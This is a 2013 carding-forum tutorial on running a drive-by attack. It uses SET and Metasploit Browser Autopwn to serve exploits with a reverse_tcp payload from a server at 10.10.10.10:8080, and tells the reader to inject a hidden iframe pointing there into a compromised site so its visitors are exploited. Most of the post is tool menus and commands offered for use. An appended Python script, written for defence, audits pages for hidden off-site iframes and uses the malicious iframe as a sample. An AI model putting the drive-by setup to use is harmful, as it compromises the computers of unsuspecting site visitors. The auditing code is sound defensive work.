Hacking Traffic of a Website with metasploit



CardingMafia Admin
03-07-2013, 09:59 AM
In this topic I will tell you how to hack the traffic of a website! Well, it is a simple way, but if you wanna go advanced you can use an exploit pack.

what will we use in this attack

1# metasploit

2# VPS

3# Iframe

4# Target website


So Lets Start ! Install metasploit in your VPS and Open Set "metasploit social engineering tool kit"



root@Scientist:~# cd /pentest/exploits/set
root@Scientist:/pentest/exploits/set# ./set


.M"""bgd `7MM"""YMM MMP""MM""YMM
,MI "Y MM `7 P' MM `7
`MMb. MM d MM
`YMMNq. MMmmMM MM
. `MM MM Y , MM
Mb dM MM ,M MM
P"Ybmmd" .JMMmmmmMMM .JMML.

[---] The Social-Engineer Toolkit (SET) [---]
[---] Created by: David Kennedy (ReL1K) [---]
[---] Development Team: JR DePre (pr1me) [---]
[---] Development Team: Joey Furr (j0fer) [---]
[---] Development Team: Thomas Werth [---]
[---] Development Team: Garland [---]
[---] Version: 3.6 [---]
[---] Codename: 'MMMMhhhhmmmmmmmmm' [---]
[---] Report bugs: [email protected] [---]
[---] Follow me on Twitter: dave_rel1k [---]
[---] Homepage: https://www.trustedsec.com [---]

Select from the menu:

1) Social-Engineering Attacks
2) Fast-Track Penetration Testing
3) Third Party Modules
4) Update the Metasploit Framework
5) Update the Social-Engineer Toolkit
6) Update SET configuration
7) Help, Credits, and About

99) Exit the Social-Engineer Toolkit

set> 1

Select from the menu:

1) Spear-Phishing Attack Vectors
2) Website Attack Vectors
3) Infectious Media Generator
4) Create a Payload and Listener
5) Mass Mailer Attack
6) Arduino-Based Attack Vector
7) SMS Spoofing Attack Vector
8) Wireless Access Point Attack Vector
9) QRCode Generator Attack Vector
10) Powershell Attack Vectors
11) Third Party Modules

99) Return back to the main menu.

set> 2

1) Java Applet Attack Method
2) Metasploit Browser Exploit Method
3) Credential Harvester Attack Method
4) Tabnabbing Attack Method
5) Man Left in the Middle Attack Method
6) Web Jacking Attack Method
7) Multi-Attack Web Method
8) Victim Web Profiler
9) Create or import a CodeSigning Certificate

99) Return to Main Menu

set:webattack>2

1) Web Templates
2) Site Cloner
3) Custom Import

99) Return to Webattack Menu

set:webattack>1
[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: yes

after this set your server Ip and port to create a payload !

let us consider 10.10.10.10 is our server Ip and 1337 is our port


[-] NAT/Port Forwarding can be used in the cases where your SET machine is
[-] not externally exposed and may be a different IP address than your reverse listener.
set> Are you using NAT/Port Forwarding [yes|no]: yes
set:webattack> IP address to SET web server (this could be your external IP or hostname):10.10.10.10
set:webattack> Is your payload handler (metasploit) on a different IP from your external NAT/Port FWD address [yes|no]:no
Now Time to set Exploit !
choose:- Metasploit Browser Autopwn (USE AT OWN RISK!)

metasploit browser autopwn Try all exploits in the database to exploit the computer via browser

Select payload to reverse_tcp or your custom payload

done ....

Now if anyone will visit our server (http://10.10.10.10:8080) will be fucked :| and metasploit will start exploiting his system

So now here come a mind game ! Now create an Iframe and insert it into your hacked website

so if anyone is visiting target.com he is also visiting 10.10.10.10:8080 in iframe !

So now keep monitoring traffic in terminal !
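
Seen from the site owner's side, the iframe the post describes is the artifact to look for in served pages. The following is an added example, not part of the original post: it audits a page's HTML for iframes that load from a host other than the site's own and records the traits of the frame described above (raw IP address, non-standard port, hidden from view). The names `audit_page`, `IframeAudit` and `HIDDEN` and the sample page are constructed for illustration.

```python
import ipaddress
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit
# Inline styles that make a frame invisible to the visitor.
HIDDEN = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden"
                    r"|(?:width|height)\s*:\s*[01](?:px)?\s*(?:;|$)", re.I)
SAMPLE = """<html><body>
<iframe src="/widgets/news.html" width="300" height="200"></iframe>
<iframe src="https://video.example.org/embed/1" width="560" height="315"></iframe>
<iframe src="http://10.10.10.10:8080/" width="0" height="0" style="display:none"></iframe>
</body></html>"""  # constructed sample page for the site "target.com"

class IframeAudit(HTMLParser):
    """Collect iframes whose src points at a host other than the site's own."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []  # list of (src, [reasons])

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        url = urlsplit(a.get("src", ""))
        host = (url.hostname or "").lower()
        if not host or host == self.site_host:
            return  # relative or same-host frame: not reported
        reasons = ["off-site host"]
        try:
            ipaddress.ip_address(host)
            reasons.append("raw IP address")
        except ValueError:
            pass  # a DNS name, not an IP literal
        try:
            port = url.port
        except ValueError:
            port = None  # malformed port in the URL
        if port not in (None, 80, 443):
            reasons.append(f"non-standard port {port}")
        if (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                or HIDDEN.search(a.get("style", ""))):
            reasons.append("hidden from view")
        self.findings.append((a["src"], reasons))

def audit_page(html, site_host):
    parser = IframeAudit(site_host)
    parser.feed(html)
    return parser.findings
```

Calling `audit_page(SAMPLE, "target.com")` skips the same-site frame, lists the ordinary third-party embed with a single reason, and lists the frame to 10.10.10.10:8080 with all four. A frame that collects several reasons is the one to trace back to the file or database row that emitted it.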